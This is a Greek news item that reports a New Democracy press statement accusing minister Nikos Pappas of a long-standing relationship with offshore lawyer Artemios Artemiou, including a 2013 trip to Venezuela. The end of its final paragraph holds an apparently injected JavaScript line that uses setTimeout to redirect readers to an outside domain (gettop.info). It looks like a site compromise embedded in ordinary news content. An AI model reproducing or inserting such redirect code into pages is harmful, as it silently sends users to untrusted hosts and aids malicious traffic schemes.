ΝΔ: Ο κ. Παππάς ομολόγησε ότι έχει πολύχρονη σχέση συνεργασίας με τον κ. Αρτεμίου

0
4

 

Επανέρχεται στο θέμα που αποκάλυψε ο Ελεύθερος Τύπος για το ταξίδι του υπουργού Επικρατείας Νίκου Παππά με τον Κύπριο δικηγόρο έμπειρο σε off shore Αρτέμιο Αρτεμίου το Γραφείο Τύπου της ΝΔ, το οποίο με ανακοίνωσή του σχολιάζει: «Ο κ. Παππάς οφείλει να πει στον ελληνικό λαό όλη την αλήθεια για την πραγματική σχέση του με το δικηγόρο των offshore και των Panama Papers».

Όπως επισημαίνει, ο υπουργός Επικρατείας «από εκεί που επί μία εβδομάδα δεν απαντούσε στο ερώτημα για το αν συναντήθηκε στις 10 Οκτωβρίου με τον δικηγόρο των offshore και των Panama Papers κ. Αρτεμίου, σήμερα παραδέχθηκε ότι, όχι μόνο γνωρίζονται, αλλά και ότι τον Αύγουστο του 2013 βρέθηκαν μαζί στη Βενεζουέλα του κ. Μαδούρο» για «να προετοιμάσουν ενδεχόμενη επίσκεψη του «συντρόφου» Τσίπρα στη Βενεζουέλα, προκειμένου η Ελλάδα να προμηθευτεί προϊόντα από τα κρατικά σούπερ μάρκετ της Βενεζουέλας!».

Η ΝΔ καταλήγει, στην ανακοίνωσή της, πως ο κ. Παππάς ομολόγησε, ουσιαστικά, ότι έχει πολύχρονη σχέση συνεργασίας με τον κ. Αρτεμίου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here